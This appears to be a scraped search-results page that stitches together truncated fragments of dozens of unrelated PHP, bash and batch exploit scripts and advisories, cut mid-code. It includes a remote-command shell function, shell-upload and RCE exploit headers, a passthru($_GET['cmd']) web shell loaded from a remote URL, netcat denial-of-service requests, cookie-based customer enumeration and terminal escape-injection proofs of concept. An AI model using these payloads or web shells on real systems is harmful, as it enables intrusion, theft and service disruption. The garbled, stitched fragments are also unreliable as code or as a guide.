Next Page >>
echo
if (empty($_POST['phpinfo'] )) {
}else{
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo()";
exit;
}
if (isset($_POST['url'])) {
}
/* Starts a remote command session */
function fp_shell($crl, $sh)
{
echo "\nStarting remote command session, type 'quit' or 'exit' to exit.\n";
echo "\nremote> ";
$line = trim(fgets(STDIN));
while (($line != 'exit') && ($line != 'quit')) {
Looking inside the application source code:
###### CUT HERE ######
<style type="text/css">
body {
background-color: #<?php echo( $user_colors[ 'bg_color' ] ); ?>;
color: #<?php echo( $user_colors[ 'txt_color' ] ); ?>;
###### CUT HERE ######
It's easy to see that the "user_colors[bg_color]" is not validated and it's used directly inside an echo function.
Sending a trivial HTTP request against PHP environments having register global ON is possible to exploit this unvalidated user input flaw.
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "
# FCMS (Family Connections) <= 0.1.1 Remote Command Execution Exploit
# AUTHOR: ilker kandemir <ilkerkandemir[at]mynet.com>
# DOWNLOAD:http://sourceforge.net/project/showfiles.php?group_id=189733
# Thanks to rgod for the php code and Ajann for helps
";
The case is of a code equivalent to the following (for example an online
file editor script).
--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";'
'ciccio.txt'
ciccio.txt
$ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";'
'ciccio.php'
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
> No, but you can upgrade file from read-only to read-write using /proc.
Hmm.
$ cd test
4 echo moo >cow
$ exec 3<cow
$ ll /proc/self/fd
total 0
0 dr-x------ 2 ap users 0 2009-10-29 09:00 .
0 dr-xr-xr-x 7 ap users 0 2009-10-29 09:00 ..
File 'template/ja_purity/index.php' reads data with getParam and write
it directly:
57 <?php if ($tmpTools->getParam('theme_header') &&
$tmpTools->getParam('theme_header')!='-1') : ?>
58 <link rel="stylesheet" href="<?php echo $tmpTools->templateurl();
?>/styles/header/<?php echo $tmpTools->getParam('theme_header');
?>/style.css" type="text/css" />
59 <?php endif; ?>
60 <?php if ($tmpTools->getParam('theme_background') &&
$tmpTools->getParam('theme_background')!='-1') : ?>
version:
---cut here---
<?php
if(sizeof($argv)!=4) {
echo "Usage: php5 $argv[0] <router ip addres> <port>
<admin password>\n";
exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
Home : v4-team.com
note : this exploit for education :)
*/
echo "[+] Start...\n";
$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');
if($bypfile and $stuffile!= NULL){
$url = "http://127.0.0.1/index.php?page=cart&action=show";
$max = 1000;
for($customerid = 1; $customerid <= $max; $customerid++)
{
echo "<h3>Customerid: " . $customerid .
"</h3>\n";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, "fws_guest=" . $customerid);
rem raidenhttpdudo.cmd
@echo off
color 0a
rem RaidenHTTPD 2.0.19 ulang cmd exec poc exploit
rem WebAdmin one - not enabled by default anymore
rem however works regardless of php.ini, because
rem "ulang" comes from $_GET[] and some magic_quo
#
# Researched by Andrew Horton (urbanadventurer)
# (c) MorningStar Security, 2009 http://www.morningstarsecurity.com/
if [ -z "$1" ]; then
echo "Usage: $0 <target-url>"
echo "File upload proof of concept exploit for Open Auto Classifieds
<= v 1.5.9"
echo "This will create a user with the name 'hacker' and pass
'31337' then upload a command execution shell."
echo -e "eg. $0 http://www.myweb.com/cardealer/\n"
Line 225 of file components/com_content/views/article/tmpl/form.php is
vunerable.
221 <input type="hidden" name="option" value="com_content" />
222 <input type="hidden" name="id" value="<?php echo
$this->article->id; ?>" />
223 <input type="hidden" name="version" value="<?php echo
$this->article->version; ?>" />
224 <input type="hidden" name="created_by" value="<?php echo
$this->article->created_by; ?>" />
[=] Technical details :
The dhost.exe process will consume 100% of a CPU. More than one request
can be used to lock every CPU.
Two "Connection:" headers : echo "GET / HTTP/1.0"; echo "Connection:
foo"; echo "Connection: bar"; echo; echo) | nc -vn 192.168.1.1 8028
One "Connection:" header with two values : (echo "GET / HTTP/1.0"; echo
"Connection: foo, bar"; echo; echo) | nc -vn 192.168.1.1 8028
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 10);
ob_implicit_flush (1);
echo'<html>
<head>
<title>PHP CGI Argument Injection Remote Exploit</title>
</head>
<p align="center"><font size="4" color="#5E767E">PHP CGI Argument
Injection</font></p>
/* MyCMS Command Execution
/* This exploit should allow you to execute commands
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
*/
echo('
/**********************************************/
/* MyCmS Command Execution */
/* by HACKERS PAL <security@soqor.net> */
/* site: http://www.soqor.net */');
if ($argc<4) {
One of the following two Proofs Of Concept can be used in order to
verify the vulnerability.
curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
B) "Varnish" log escape sequence injection
One of the following two Proofs Of Concept can be used in order to
- -rw-r--r-- 1 www www 27 Sep 10 03:49 sleep.php
127# cat .htaccess
php_value error_log /etc/
127# cat not.php
<?php
echo "only echo\n";
?>
127# cat pufff.php
<?php
echo "safe_mode=".ini_get("safe_mode")."\n";
echo "error_log=".ini_get("error_log")."\n";
-- cut --
#!/bin/sh
if [ -z $1 ] || [ -z $2 ]; then
echo "$0 addr file"
exit
fi
echo "--+ Arbitrary File Download PoC for Sourcefire 3D Defense Center
< 4.10.2.3 +--"
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);
echo'<html>
<head>
<title>JCE Joomla Extension Remote File Upload</title>
</head>
<body bgcolor="#00000">
On line 353 in googleanalytics.php the following vulnerable code was identified:
/**
* If this is a 404 page, track the 404 and prevent all other stuff as it's not needed.
*/
if ( is_404() ) {
echo "\t\t".'pageTracker._trackPageview("/404.html?page=" + document.location.pathname + document.location.search + "&from=" + document.referrer);'."\n";
echo "\t".'} catch(err) {}'."\n";
echo '</script>'."\n";
} else if ($wp_query->is_search && $wp_query->found_posts == 0) {
echo "\t\t".'pageTracker._trackPageview("'.get_bloginfo('url').'/?s=no-results: '.$wp_query->query_vars['s'].'&cat=no-results");'."\n";
echo "\t".'} catch(err) {}'."\n";
#PS: M7at7et w mrayech .. Man get a fucking life !!
#
IP=$1
echo -e "\n Sagem Router F@ST 2404 Remote Denial Of Service Exploit "
echo -e "\n By Underz0ne Crew "
if [ "$IP" = "" ];then
echo -e "\n USAGE : $0 [IP]\n"
echo -e "\n Example: $0 192.168.1.1\n "
/* ELSE IF CMS Multiple vulnerabilities
/* This exploit should allow you to Upload Shell ..
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
*/
echo('
/**********************************************/
/* ELSEIF CMS Shell Upload Exploit */
/* by HACKERS PAL <security@soqor.net> */
/* site: http://www.soqor.net */');
if ($argc<4) {
Options:
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
shell.txt: <?php ob_clean();echo"iLker Kandemir www.mefistolabs.com";ini_set("max_execution_time",0);echo "mefistolabs";passthru($_GET["cmd"]);die;?>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
echo "Building exploit...<br />";
echo "coding by Super-Crystal <br />";
echo "Cleaning up<br />";
echo "Done!<br />
</pre>";
} else {
$in = fopen("php://stdin", 'r');
$text = fgets($in, 1024);
$text = trim($text);
return $text; }
echo "Gelato SQL Injection exploit -- by s0cratex\n";
echo "-------------------------------------------\n\n";
echo "Host (site.com): ";
$host = get_text();
> Options:
> -p[port]: specify a port other than 80
> -P[ip:port]: specify a proxy
> Example:
> php '.$argv[0].' localhost http://www.site.com/shell.txt ls -la -P1.1.1.1:80
> shell.txt: <?php ob_clean();echo"iLker Kandemir
> www.mefistolabs.com";ini_set("max_execution_time",0);echo
> "mefistolabs";passthru($_GET["cmd"]);die;?>
> -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
> ');
> die;
https://[CISCOVPNSSL]/+CSCO+00756767633a2f2f766167656e617267++
This is a simple PoC for easy demonstration:
#!/bin/bash
echo -n "write URL:"
read a
b=`echo -n $a | tr '[a-m][n-z][A-M][N-Z]' '[n-z][a-m][N-Z][A-M]' | od
-tx1 | cut -c8- | sed 's/ //g'` | paste -s -d '';
echo -n "URL "
echo -n "https://[CISCOVPNSSL]/+CSCO+00"; echo -n $b; echo -n "++";
including your statement below is all based on false assumptions...
I'll show you a snip out of my strace of the original scenario, being
performed by
Pavel. But the same mechanism is being performed by you, Jim, in the
following step:
# su nobody -c 'echo "hacked" >/proc/self/fd/0' < /dir/file.txt
All you do is just open the FILE via the path of /proc, not via the
assumed
path via /tmp (or /dir in your example) nor access the assumed read-
only fd being
Next Page>>
|
